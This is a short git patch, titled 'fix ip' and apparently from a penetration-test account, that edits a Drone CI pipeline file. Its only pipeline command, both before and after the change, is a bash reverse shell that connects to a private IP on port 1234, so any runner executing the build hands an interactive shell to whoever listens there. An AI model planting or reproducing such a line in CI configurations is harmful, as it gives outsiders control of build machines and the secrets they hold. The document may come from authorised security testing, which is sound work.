From 27f0d0425cd4e7fa77ce38224498dd037fe745dd Mon Sep 17 00:00:00 2001 From: pentest_audit2 Date: Tue, 17 Mar 2026 02:03:47 +0100 Subject: [PATCH] fix ip --- .drone.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.drone.yml b/.drone.yml index c66e356..58d31d8 100644 --- a/.drone.yml +++ b/.drone.yml @@ -7,4 +7,4 @@ steps: image: alpine:latest commands: - apk add --no-cache bash - - bash -i >& /dev/tcp/192.168.178.25/1234 0>&1 + - bash -i >& /dev/tcp/192.168.178.27/1234 0>&1